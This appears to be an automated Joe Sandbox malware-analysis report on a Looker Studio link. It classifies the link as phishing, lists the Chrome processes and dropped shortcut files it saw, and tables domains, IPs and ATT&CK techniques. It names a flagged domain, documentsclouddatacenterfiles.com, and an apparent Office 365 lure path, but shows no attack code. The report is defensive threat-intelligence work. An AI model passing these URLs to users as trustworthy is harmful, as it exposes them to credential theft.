          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
          Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50132 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50126 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
          Source: classification engineClassification label: mal60.phis.win@23/92@68/384
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1216 --field-trial-handle=1908,i,1000798072012189468,2701915882668230964,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://lookerstudio.google.com/s/r0LPf6tGFnw"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1216 --field-trial-handle=1908,i,1000798072012189468,2701915882668230964,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire Infrastructure1
          Drive-by Compromise
          Windows Management Instrumentation1
          Browser Extensions
          1
          Process Injection
          1
          Masquerading
          OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/Job1
          Registry Run Keys / Startup Folder
          1
          Registry Run Keys / Startup Folder
          1
          Process Injection
          LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
          Non-Application Layer Protocol
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
          Extra Window Memory Injection
          1
          Extra Window Memory Injection
          Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
          Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
          Ingress Tool Transfer
          Traffic DuplicationData Destruction

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          http://lookerstudio.google.com/s/r0LPf6tGFnw0%Avira URL Cloudsafe
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          https://www.google.com/recaptcha/api.js?trustedtypes=true&render=6LcE_6MUAAAAACM2aL4qbFG8PNDIIl4krUNCLmXE0%Avira URL Cloudsafe
          https://lookerstudio.google.com/reporting/81df319f-c619-47b3-a6ca-c725ddb997af?s=r0LPf6tGFnw0%Avira URL Cloudsafe
          https://lookerstudio.google.com/s/r0LPf6tGFnw0%Avira URL Cloudsafe
          https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LcE_6MUAAAAACM2aL4qbFG8PNDIIl4krUNCLmXE&co=aHR0cHM6Ly9sb29rZXJzdHVkaW8uZ29vZ2xlLmNvbTo0NDM.&hl=en&v=IyZ984yGrXrBd6ihLOYGwy9X&size=invisible&cb=6dx30beu4eu90%Avira URL Cloudsafe
          https://lookerstudio.google.com/updatePresence?appVersion=20250210_00070%Avira URL Cloudsafe
          https://lookerstudio.google.com/getImageV2?reportId=81df319f-c619-47b3-a6ca-c725ddb997af&id=ADpgoFVYV%2FnGjGKkaPduuVlic9dveoFsHciDQS2sgWmVRW9TG7npuYoJyyxcQE8YbagId8hkPN2b5pa2teWlLsUQlIsfEbmkvGearM8enCY1p8uWrdZPLddsmp6tCf0HcdOJ4PQM2Bv0PJgjYD6fK8OgcTJTDz60mlaVoidMtTQ%3D0%Avira URL Cloudsafe
          https://documentsclouddatacenterfiles.com/EyIqNHAA0%Avira URL Cloudsafe
          https://lookerstudio.google.com/external0%Avira URL Cloudsafe
          https://lookerstudio.google.com/getReport?appVersion=20250210_00070%Avira URL Cloudsafe
          https://a.nel.cloudflare.com/report/v4?s=oj0rKxLJZfJpiGRCq5UJjXt0EkaLH3k49kbvt%2BmztxGn%2BBKs7yZ3GvKWm1PrTm5tVVzlk8VG9Op7aPc41roR7hOGj2e39vCHkksDKnmgLEPRQ1hspvHfquh4RcGDN8Zi1q5h8dxIS4m4jdeINHizdQk8WPg%3D0%Avira URL Cloudsafe
          https://lookerstudio.google.com/getFirebaseAuthToken?appVersion=20250210_00070%Avira URL Cloudsafe
          https://lookerstudio.google.com/favicon.ico0%Avira URL Cloudsafe
          https://documentsclouddatacenterfiles.com/favicon.ico0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          documentsclouddatacenterfiles.com
          172.67.223.147
          truetrue
            unknown
            lookerstudio.google.com
            142.250.185.142
            truefalse
              high
              a.nel.cloudflare.com
              35.190.80.1
              truefalse
                high
                e329293.dscd.akamaiedge.net
                95.101.182.65
                truefalse
                  high
                  plus.l.google.com
                  142.250.185.174
                  truefalse
                    high
                    play.google.com
                    172.217.16.206
                    truefalse
                      high
                      code.jquery.com
                      151.101.2.137
                      truefalse
                        high
                        www.google.com
                        142.250.185.196
                        truefalse
                          high
                          view.documentsclouddatacenterfiles.com
                          104.21.54.42
                          truetrue
                            unknown
                            s-part-0032.t-0009.t-msedge.net
                            13.107.246.60
                            truefalse
                              high
                              datacenter.documentsclouddatacenterfiles.com
                              unknown
                              unknownfalse
                                high
                                aadcdn.msftauth.net
                                unknown
                                unknownfalse
                                  high
                                  apis.google.com
                                  unknown
                                  unknownfalse
                                    high
                                    NameMaliciousAntivirus DetectionReputation
                                    https://documentsclouddatacenterfiles.com/EyIqNHAA?office365cloud=truetrue
                                      unknown
                                      https://documentsclouddatacenterfiles.com/true
                                        unknown
                                        https://view.documentsclouddatacenterfiles.com/SNSLEDfalse
                                          unknown
                                          https://apis.google.com/js/googleapis.proxy.js?onload=startupfalse
                                            high
                                            https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LcE_6MUAAAAACM2aL4qbFG8PNDIIl4krUNCLmXE&co=aHR0cHM6Ly9sb29rZXJzdHVkaW8uZ29vZ2xlLmNvbTo0NDM.&hl=en&v=IyZ984yGrXrBd6ihLOYGwy9X&size=invisible&cb=6dx30beu4eu9false
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://apis.google.com/_/scs/abc-static/_/js/k=gapi.lb.en.5oZHy0SiJxw.O/m=googleapis_proxy/rt=j/sv=1/d=1/ed=1/rs=AHpOoo-Hry6DG-RE4t9kNz_t6hiwmwXOmA/cb=gapi.loaded_0?le=scsfalse
                                              high
                                              https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                                high
                                                https://apis.google.com/js/client.jsfalse
                                                  high
                                                  https://apis.google.com/_/scs/abc-static/_/js/k=gapi.lb.en.5oZHy0SiJxw.O/m=client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo-Hry6DG-RE4t9kNz_t6hiwmwXOmA/cb=gapi.loaded_0?le=scsfalse
                                                    high
                                                    https://documentsclouddatacenterfiles.com/favicon.icotrue
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://lookerstudio.google.com/s/r0LPf6tGFnwfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://lookerstudio.google.com/reporting/81df319f-c619-47b3-a6ca-c725ddb997af/page/p_4gb3na7ypd?s=r0LPf6tGFnwfalse
                                                      unknown
                                                      https://www.google.com/recaptcha/api2/webworker.js?hl=en&v=IyZ984yGrXrBd6ihLOYGwy9Xfalse
                                                        high
                                                        https://lookerstudio.google.com/favicon.icofalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://lookerstudio.google.com/reporting/81df319f-c619-47b3-a6ca-c725ddb997af?s=r0LPf6tGFnwfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://lookerstudio.google.com/updatePresence?appVersion=20250210_0007false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://lookerstudio.google.com/s/r0LPf6tGFnwfalse
                                                          unknown
                                                          https://lookerstudio.google.com/getImageV2?reportId=81df319f-c619-47b3-a6ca-c725ddb997af&id=ADpgoFVYV%2FnGjGKkaPduuVlic9dveoFsHciDQS2sgWmVRW9TG7npuYoJyyxcQE8YbagId8hkPN2b5pa2teWlLsUQlIsfEbmkvGearM8enCY1p8uWrdZPLddsmp6tCf0HcdOJ4PQM2Bv0PJgjYD6fK8OgcTJTDz60mlaVoidMtTQ%3Dfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://www.google.com/recaptcha/api.js?trustedtypes=true&render=6LcE_6MUAAAAACM2aL4qbFG8PNDIIl4krUNCLmXEfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://lookerstudio.google.com/getReport?appVersion=20250210_0007false
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://lookerstudio.google.com/getFirebaseAuthToken?appVersion=20250210_0007false
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://lookerstudio.google.com/externalfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://documentsclouddatacenterfiles.com/EyIqNHAAtrue
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://a.nel.cloudflare.com/report/v4?s=oj0rKxLJZfJpiGRCq5UJjXt0EkaLH3k49kbvt%2BmztxGn%2BBKs7yZ3GvKWm1PrTm5tVVzlk8VG9Op7aPc41roR7hOGj2e39vCHkksDKnmgLEPRQ1hspvHfquh4RcGDN8Zi1q5h8dxIS4m4jdeINHizdQk8WPg%3Dfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs
                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          142.250.185.99
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          142.250.185.78
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          142.250.74.202
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          142.250.185.206
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          142.250.185.227
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          13.107.246.60
                                                          s-part-0032.t-0009.t-msedge.netUnited States
                                                          8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                          142.250.185.106
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          142.250.181.234
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          20.42.65.85
                                                          unknownUnited States
                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                          216.58.206.35
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          142.250.181.238
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          172.67.223.147
                                                          documentsclouddatacenterfiles.comUnited States
                                                          13335CLOUDFLARENETUStrue
                                                          142.250.185.163
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          142.250.185.142
                                                          lookerstudio.google.comUnited States
                                                          15169GOOGLEUSfalse
                                                          35.190.80.1
                                                          a.nel.cloudflare.comUnited States
                                                          15169GOOGLEUSfalse
                                                          142.250.184.227
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          40.126.31.69
                                                          unknownUnited States
                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                          172.217.18.10
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          216.239.32.178
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          142.250.184.202
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          216.58.212.170
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          142.250.185.67
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          172.217.16.202
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          1.1.1.1
                                                          unknownAustralia
                                                          13335CLOUDFLARENETUSfalse
                                                          52.182.143.208
                                                          unknownUnited States
                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                          108.177.15.84
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          172.217.16.206
                                                          play.google.comUnited States
                                                          15169GOOGLEUSfalse
                                                          142.250.185.234
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          142.250.185.238
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          216.58.206.68
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          216.58.206.46
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          104.21.54.42
                                                          view.documentsclouddatacenterfiles.comUnited States
                                                          13335CLOUDFLARENETUStrue
                                                          142.250.186.106
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          151.101.2.137
                                                          code.jquery.comUnited States
                                                          54113FASTLYUSfalse
                                                          40.126.31.2
                                                          unknownUnited States
                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                          239.255.255.250
                                                          unknownReserved
                                                          unknownunknownfalse
                                                          142.250.185.174
                                                          plus.l.google.comUnited States
                                                          15169GOOGLEUSfalse
                                                          142.250.185.196
                                                          www.google.comUnited States
                                                          15169GOOGLEUSfalse
                                                          142.250.186.142
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          142.250.186.40
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          142.250.184.232
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          172.217.16.131
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          IP
                                                          192.168.2.17
                                                          192.168.2.16
                                                          192.168.2.13
                                                          192.168.2.15
                                                          Joe Sandbox version:42.0.0 Malachite
                                                          Analysis ID:1624026
                                                          Start date and time:2025-02-25 19:01:36 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                          Sample URL:http://lookerstudio.google.com/s/r0LPf6tGFnw
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:13
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • EGA enabled
                                                          Analysis Mode:stream
                                                          Analysis stop reason:Timeout
                                                          Detection:MAL
                                                          Classification:mal60.phis.win@23/92@68/384
                                                          • Exclude process from analysis (whitelisted): svchost.exe
                                                          • Excluded IPs from analysis (whitelisted): 142.250.185.99, 142.250.185.78, 108.177.15.84, 142.250.186.174, 142.250.186.46, 217.20.57.19, 142.250.184.202, 142.250.185.227, 216.58.206.35, 216.239.32.178, 216.239.38.178, 216.239.34.178, 216.239.36.178
                                                          • Excluded domains from analysis (whitelisted): fonts.googleapis.com, ssl.gstatic.com, clients2.google.com, accounts.google.com, redirector.gvt1.com, fonts.gstatic.com, www-alv.google-analytics.com, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com, www.google-analytics.com
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                          • VT rate limit hit for: http://lookerstudio.google.com/s/r0LPf6tGFnw
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Feb 25 17:02:08 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                          Category:dropped
                                                          Size (bytes):2673
                                                          Entropy (8bit):3.985753900052424
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:D3B81430A63E0CCD6E72E4DAA0D239AB
                                                          SHA1:26C8A1FD8D578FE989FCB55BF298F601C5435249
                                                          SHA-256:85E71DC472D4335BF81E30285933A9589DAEDA2A745FFE5DF780DF86CC16AA0A
                                                          SHA-512:03510FE2472A3F63F369E2C20DABC1901FCFEA1596BDD2E3C94EF686C94489D74D3387643CAB5058FEA73D40C49E238DB8344886DD891A0EF5522E3EF58F2544
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:L..................F.@.. ...$+.,.....[.b....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IYZ:.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VYZC.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VYZC.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VYZC............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VYZE............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............mb.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Feb 25 17:02:08 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                          Category:dropped
                                                          Size (bytes):2675
                                                          Entropy (8bit):4.000256148286861
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:7E709D703E821739E1690B040A85F233
                                                          SHA1:6961A9A7A48071F6BADBA1F6EB5E913C09B6DC07
                                                          SHA-256:22EA6CBBC031C9C19E8718F1E89C75A1B4A4E7266A1439E4D8532380F06C6270
                                                          SHA-512:DCE8D6937425CE4E482252D95BDB7F0E4D27842F315576A708C98CEE5C835CCA180E3677A6403E6A01ED88A650DAD961A76221C5ECE75C4E1BAFBDE0A6030799
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:L..................F.@.. ...$+.,.......b....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IYZ:.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VYZC.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VYZC.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VYZC............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VYZE............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............mb.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                          Category:dropped
                                                          Size (bytes):2689
                                                          Entropy (8bit):4.007716432295058
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:7A27B354A46752FD098865D756C2216B
                                                          SHA1:EADA757ADE253E60D41E3F92C5DD852EDF153C9C
                                                          SHA-256:7937E43A0A3E59E38FF398D9944201AFBFE57A1C2085F93175D5E64FC8743D0D
                                                          SHA-512:44BEF796DDDD1E3635456AB023CAC4CCE8831B7D3E8A671E51D0FA9CD0D0C95728D9F65F0658E4285A6538E8898E2E621451C1A77CAA24A1688B61BB7FF87A0C
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IYZ:.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VYZC.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VYZC.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VYZC............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............mb.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Feb 25 17:02:08 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                          Category:dropped
                                                          Size (bytes):2677
                                                          Entropy (8bit):3.99635907540589
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:FC94BC1C789A0BED6F5E146639A90BA5
                                                          SHA1:1C7C41BDA94EE90061BBF6136D3F64581720EDCA
                                                          SHA-256:3DDE1955165952DAEC0470A5CC830E64140E831EE8E7E3F1870B18D95AEC606F
                                                          SHA-512:92E8E0ABC228B9D31CA447B56A01714FB491B4983BC432B03E7262A9F82BDDE88FE34EF48CEC554D909B1FF50129BA6098F1B414F43B9519A4ADBDE3BB3087A5
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:L..................F.@.. ...$+.,.....o.b....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IYZ:.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VYZC.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VYZC.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VYZC............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VYZE............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............mb.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Feb 25 17:02:08 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                          Category:dropped
                                                          Size (bytes):2677
                                                          Entropy (8bit):3.9851401050294206
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:A75A808FAADD88BADF0E8BA6057F2C80
                                                          SHA1:AA32A863511A4108CC3623796DDC8163916C70E8
                                                          SHA-256:09D7C6BB8B104298AA107562D1D082AA18BA09B951959F62FB517F62F03A2398
                                                          SHA-512:886E30B16923C3F6C9D2C71B6EF2D3D0972C78579386282D167266D2C5AF063470587D3BDABEBCD28F1C05D671108804CF901A51480CBCD6AAF2270D61615524
                                                          Malicious:false
                                                          Reputation:unknown
